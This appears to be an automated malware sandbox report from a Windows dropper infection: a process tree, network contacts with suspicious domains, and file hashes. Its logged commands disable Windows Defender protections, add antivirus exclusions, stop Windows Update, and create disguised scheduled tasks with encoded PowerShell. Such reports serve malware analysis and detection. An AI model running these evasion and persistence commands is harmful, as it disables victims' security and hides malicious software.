"C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp" /SL4 $8004C "C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe" 2846236 52224

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

"C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3800 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231006063457" --session-guid=a0bc4cf9-0752-4633-b8fd-4d8b1f4e1e8c --server-tracking-blob=OWQyODRmMDBmYWNhNTJlZTNkZGUxODA4Y2NmMjljNTc2ZWQ0ZDRmMmI3NTY5N2VmNDFiYTBjYTk1OTEwMTU1MTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjU3NDA5Mi44MTk0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIzZGY0OGNkMC1hNjQ3LTQ0ZDYtYWQyNS04MGEzOTc2NjQ2MTgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4804000000000000

C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe

"C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe"

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

"C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d708538,0x6d708548,0x6d708554

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe

"C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe"

C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp" /SL5="$402CE,5025136,832512,C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zSEF32.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSF201.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Users\Admin\Pictures\UoE0rZ1e2TyOqz5gXFtrvWZo.exe

"C:\Users\Admin\Pictures\UoE0rZ1e2TyOqz5gXFtrvWZo.exe"

C:\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\8758677____.exe" /S /UID=lylal220

C:\Users\Admin\AppData\Local\Temp\is-TPBS9.tmp\_isetup\_setup64.tmp

helper 105 0x3B4

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp

"C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp" /SL5="$50234,491750,408064,C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe"

C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe

"C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f178538,0x6f178548,0x6f178554

C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe

"C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe"

C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe

"C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

"C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe" --silent --allusers=0

C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe

"C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

"C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gjBQkZxno" /SC once /ST 00:36:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gjBQkZxno"

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe

"C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-89M97.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-89M97.tmp\lightcleaner.tmp" /SL5="$701F2,833775,56832,C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gjBQkZxno"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bAutabDQFHrvmwrWbf" /SC once /ST 06:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\fYpCWIb.exe\" F9 /UIsite_idHTo 385120 /S" /V1 /F

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\Assistant_103.0.4928.16_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\Assistant_103.0.4928.16_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x5f1588,0x5f1598,0x5f15a4

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

"C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe"

C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe

"C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\fYpCWIb.exe

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\fYpCWIb.exe F9 /UIsite_idHTo 385120 /S

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 update.wf udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 drivelikea.com udp
US 8.8.8.8:53 hbn42414.beget.tech udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 lancetjournal.com udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 galandskiyher4.com udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 grupoeca.co udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 link.storjshare.io udp
US 85.217.144.143:80 85.217.144.143 tcp
DE 148.251.234.93:443 yip.su tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 188.114.96.0:443 lancetjournal.com tcp
US 188.114.96.0:443 lancetjournal.com tcp
NL 13.227.219.122:443 downloads.digitalpulsedata.com tcp
US 172.67.187.122:443 lycheepanel.info tcp
RU 91.212.166.16:443 update.wf tcp
RU 87.236.19.5:80 hbn42414.beget.tech tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 winterhunter.org udp
US 72.29.85.225:443 grupoeca.co tcp
US 104.21.20.38:443 winterhunter.org tcp
NL 194.169.175.127:80 galandskiyher4.com tcp
RU 212.193.49.228:80 goboh2b.top tcp
US 8.8.8.8:53 potatogoose.com udp
US 104.21.35.235:443 potatogoose.com tcp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 122.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 122.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 16.166.212.91.in-addr.arpa udp
US 8.8.8.8:53 5.19.236.87.in-addr.arpa udp
US 8.8.8.8:53 38.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 225.85.29.72.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 235.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 d062.userscloud.net udp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 136.0.77.2:80 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.106:443 features.opera-api2.com tcp
NL 82.145.216.23:443 download.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 106.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
DE 52.219.169.230:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 230.169.219.52.in-addr.arpa udp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 94.142.138.113:80 94.142.138.113 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 113.138.142.94.in-addr.arpa udp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 72.132.240.87.in-addr.arpa udp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
NL 94.142.138.113:80 94.142.138.113 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 datasheet.fun udp
US 104.21.89.251:80 datasheet.fun tcp
US 8.8.8.8:53 251.89.21.104.in-addr.arpa udp
US 8.8.8.8:53 59.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp

Files

memory/3432-0-0x00007FF6D62E0000-0x00007FF6D66F0000-memory.dmp

memory/4892-5-0x000001CE629B0000-0x000001CE629D2000-memory.dmp

memory/4892-6-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

memory/4892-7-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/4892-8-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/4892-11-0x000001CE62B60000-0x000001CE62BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ufvokg2y.5xw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4892-24-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/3432-27-0x00007FF6D62E0000-0x00007FF6D66F0000-memory.dmp

memory/4060-42-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4060-43-0x00000000738B0000-0x0000000073F9E000-memory.dmp

memory/4060-48-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4892-51-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/4892-55-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

MD5 3aabd684cee6bd8d66cb6b0cdd39f427
SHA1 efb2a6e24f860b36993362bab5978fe87c11d94b
SHA256 26bc8d3858f2512979aef222a18c60a22d4fa26541ed0226e31fafb36028441d
SHA512 32854d24b70ab5983bb3c54949162317beeb936df81fe0ad7927e89dd865dcbd51d6a6c5db293a148c916787826c9940c25f2aa6fddb395c73fe88d81019eef4

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

MD5 3aabd684cee6bd8d66cb6b0cdd39f427
SHA1 efb2a6e24f860b36993362bab5978fe87c11d94b
SHA256 26bc8d3858f2512979aef222a18c60a22d4fa26541ed0226e31fafb36028441d
SHA512 32854d24b70ab5983bb3c54949162317beeb936df81fe0ad7927e89dd865dcbd51d6a6c5db293a148c916787826c9940c25f2aa6fddb395c73fe88d81019eef4

C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe

MD5 36225cb2e4a6d6f60d2f0132c0b19072
SHA1 f6ab6d846c924d5ef38025b32b521891f43d187c
SHA256 95f7d3916f7e6ca3d855c7bfa3fb549ce6fec2e1c4ee3e4e04ba0ef55a419bd4
SHA512 a3c93d81aa15c86fd4ae78142e722c88adba23f203c21e4ab8c90dfc45402b3b226de664c90a659691ce6f40ce41a6789a28b12cfec3af7888b133138c599170

C:\Users\Admin\Pictures\f6HIBpWZz6vXG4h2PgTe8JUo.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

memory/2348-77-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe

MD5 36225cb2e4a6d6f60d2f0132c0b19072
SHA1 f6ab6d846c924d5ef38025b32b521891f43d187c
SHA256 95f7d3916f7e6ca3d855c7bfa3fb549ce6fec2e1c4ee3e4e04ba0ef55a419bd4
SHA512 a3c93d81aa15c86fd4ae78142e722c88adba23f203c21e4ab8c90dfc45402b3b226de664c90a659691ce6f40ce41a6789a28b12cfec3af7888b133138c599170

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

MD5 cfc408dc44c357b7945e09f37f5a0f84
SHA1 0a63edb32f421127f5cb106667f967bf33a774ef
SHA256 051f2d78b7632727deed70bdbe9f41f5a8f94d8f7e596b70eaa6da72fa0412aa
SHA512 5ea4178af48fd0bf213ff06dd1406f153cacd98d28f772d47e617e82fcd2fd78d6559a507c39d51e8351c2e783a8375800f8feebaa622403f7d8fe8feb784b92

C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
